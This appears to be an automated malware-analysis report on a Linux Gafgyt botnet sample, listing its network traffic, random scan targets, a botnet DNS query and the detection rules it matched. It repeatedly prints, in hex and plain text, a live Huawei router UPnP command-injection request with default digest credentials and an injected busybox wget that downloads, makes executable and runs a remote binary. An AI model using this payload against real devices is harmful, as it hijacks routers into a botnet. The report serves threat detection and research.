            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:s
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:s
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:s
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:s
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 39.190.184.244
            Source: unknownTCP traffic detected without corresponding DNS query: 41.174.49.12
            Source: unknownTCP traffic detected without corresponding DNS query: 157.194.69.244
            Source: unknownTCP traffic detected without corresponding DNS query: 41.134.182.194
            Source: unknownTCP traffic detected without corresponding DNS query: 202.142.6.156
            Source: unknownTCP traffic detected without corresponding DNS query: 41.199.133.76
            Source: unknownTCP traffic detected without corresponding DNS query: 41.3.147.33
            Source: unknownTCP traffic detected without corresponding DNS query: 41.166.240.54
            Source: unknownTCP traffic detected without corresponding DNS query: 197.33.178.9
            Source: unknownTCP traffic detected without corresponding DNS query: 41.213.207.26
            Source: unknownTCP traffic detected without corresponding DNS query: 193.137.56.102
            Source: unknownTCP traffic detected without corresponding DNS query: 157.47.228.24
            Source: unknownTCP traffic detected without corresponding DNS query: 41.1.26.86
            Source: unknownTCP traffic detected without corresponding DNS query: 157.72.51.40
            Source: unknownTCP traffic detected without corresponding DNS query: 157.227.189.87
            Source: unknownTCP traffic detected without corresponding DNS query: 197.113.138.207
            Source: unknownTCP traffic detected without corresponding DNS query: 157.56.68.128
            Source: unknownTCP traffic detected without corresponding DNS query: 197.184.59.100
            Source: unknownTCP traffic detected without corresponding DNS query: 197.219.199.116
            Source: unknownTCP traffic detected without corresponding DNS query: 157.0.102.4
            Source: unknownTCP traffic detected without corresponding DNS query: 41.216.102.42
            Source: unknownTCP traffic detected without corresponding DNS query: 197.71.87.26
            Source: unknownTCP traffic detected without corresponding DNS query: 197.194.244.218
            Source: unknownTCP traffic detected without corresponding DNS query: 197.241.218.88
            Source: unknownTCP traffic detected without corresponding DNS query: 41.122.226.207
            Source: unknownTCP traffic detected without corresponding DNS query: 41.135.200.90
            Source: unknownTCP traffic detected without corresponding DNS query: 197.60.46.17
            Source: unknownTCP traffic detected without corresponding DNS query: 47.189.81.161
            Source: unknownTCP traffic detected without corresponding DNS query: 197.49.109.239
            Source: unknownTCP traffic detected without corresponding DNS query: 197.50.105.242
            Source: unknownTCP traffic detected without corresponding DNS query: 157.132.9.21
            Source: unknownTCP traffic detected without corresponding DNS query: 157.111.36.33
            Source: unknownTCP traffic detected without corresponding DNS query: 197.134.30.249
            Source: unknownTCP traffic detected without corresponding DNS query: 157.32.199.80
            Source: unknownTCP traffic detected without corresponding DNS query: 197.96.78.163
            Source: unknownTCP traffic detected without corresponding DNS query: 41.78.39.89
            Source: unknownTCP traffic detected without corresponding DNS query: 205.28.15.181
            Source: unknownTCP traffic detected without corresponding DNS query: 197.158.237.161
            Source: unknownTCP traffic detected without corresponding DNS query: 157.73.152.98
            Source: unknownTCP traffic detected without corresponding DNS query: 165.234.158.91
            Source: unknownTCP traffic detected without corresponding DNS query: 8.117.135.33
            Source: unknownTCP traffic detected without corresponding DNS query: 41.152.194.32
            Source: unknownTCP traffic detected without corresponding DNS query: 41.139.135.181
            Source: unknownTCP traffic detected without corresponding DNS query: 174.225.217.106
            Source: unknownTCP traffic detected without corresponding DNS query: 157.188.73.120
            Source: unknownTCP traffic detected without corresponding DNS query: 197.217.83.244
            Source: unknownTCP traffic detected without corresponding DNS query: 153.236.87.145
            Source: unknownTCP traffic detected without corresponding DNS query: 197.187.164.4
            Source: unknownTCP traffic detected without corresponding DNS query: 197.115.247.20
            Source: unknownTCP traffic detected without corresponding DNS query: 197.66.42.254
            Source: k9fBkBGZNf.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: k9fBkBGZNf.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownDNS traffic detected: queries for: botnet.layer4.vip

            System Summary

            barindex
            Source: k9fBkBGZNf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: k9fBkBGZNf.elf PID: 6232, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: k9fBkBGZNf.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
